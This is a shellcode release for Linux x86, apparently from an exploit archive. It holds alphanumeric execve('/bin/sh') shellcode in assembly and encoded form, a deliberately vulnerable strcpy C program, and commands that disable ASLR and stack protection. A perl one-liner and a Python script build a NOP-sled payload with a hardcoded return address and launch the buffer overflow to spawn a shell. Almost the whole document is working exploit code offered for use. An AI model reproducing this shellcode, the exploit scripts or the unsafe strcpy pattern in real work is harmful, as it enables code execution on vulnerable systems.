109 lines
No EOL
2.4 KiB
C
109 lines
No EOL
2.4 KiB
C
# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
|
|
# Date: 2019-12-31
|
|
# Shellcode Author: bolonobolo
|
|
# Tested on: Linux x86
|
|
|
|
######################## execve.asm ###############################
|
|
global _start
|
|
|
|
section .text
|
|
_start:
|
|
|
|
; int 0x80 ------------
|
|
push 0x30
|
|
pop eax
|
|
xor al, 0x30
|
|
push eax
|
|
pop edx
|
|
dec eax
|
|
xor ax, 0x4f73
|
|
xor ax, 0x3041
|
|
push eax
|
|
push edx
|
|
pop eax
|
|
;----------------------
|
|
push edx
|
|
push 0x68735858
|
|
pop eax
|
|
xor ax, 0x7777
|
|
push eax
|
|
push 0x30
|
|
pop eax
|
|
xor al, 0x30
|
|
xor eax, 0x6e696230
|
|
dec eax
|
|
push eax
|
|
|
|
; pushad/popad to place /bin/sh in EBX register
|
|
push esp
|
|
pop eax
|
|
push edx
|
|
push ecx
|
|
push ebx
|
|
push eax
|
|
push esp
|
|
push ebp
|
|
push esi
|
|
push edi
|
|
popad
|
|
push eax
|
|
pop ecx
|
|
push ebx
|
|
|
|
xor al, 0x4a
|
|
xor al, 0x41
|
|
|
|
######################## ASCII string ##########################
|
|
|
|
j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A
|
|
|
|
########################## bof.c ####################
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
int main(int argc, char *argv[]){
|
|
char buffer[128];
|
|
strcpy(buffer, argv[1]);
|
|
return 0;
|
|
}
|
|
|
|
|
|
When you test it on new kernels remember to disable the
|
|
randomize_va_space and to compile the C program with execstack enabled
|
|
and the stack protector disabled
|
|
|
|
# bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
|
|
# sysctl -p
|
|
# gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g
|
|
bof.c -o bof
|
|
|
|
|
|
###################################################################
|
|
|
|
./bof `perl -e 'print "\x90"x48 .
|
|
"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" .
|
|
"D"x16 . "\xff\xe4" . "\x79\xf7\xff\xbf"'`
|
|
|
|
The \x79\xf7\xff\xbf may change, you must find yourself an address in
|
|
the NOP befor the shellcode
|
|
|
|
#################### alpha.py ############################
|
|
|
|
#!/usr/bin/python
|
|
import os
|
|
|
|
print "[*] Loading NOP"
|
|
z = "\x90"*48
|
|
print "[*] Loading alphanumeric"
|
|
z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
|
|
print "[*] Loading syscall"
|
|
z += "D"*16
|
|
print "[*] Loading JMP and landing address"
|
|
z += "\xff\xe4\x79\xf7\xff\xbf"
|
|
print "[*] Popping the shell..."
|
|
os.system("./bof " + z)
|
|
|
|
|
|
################################################################## |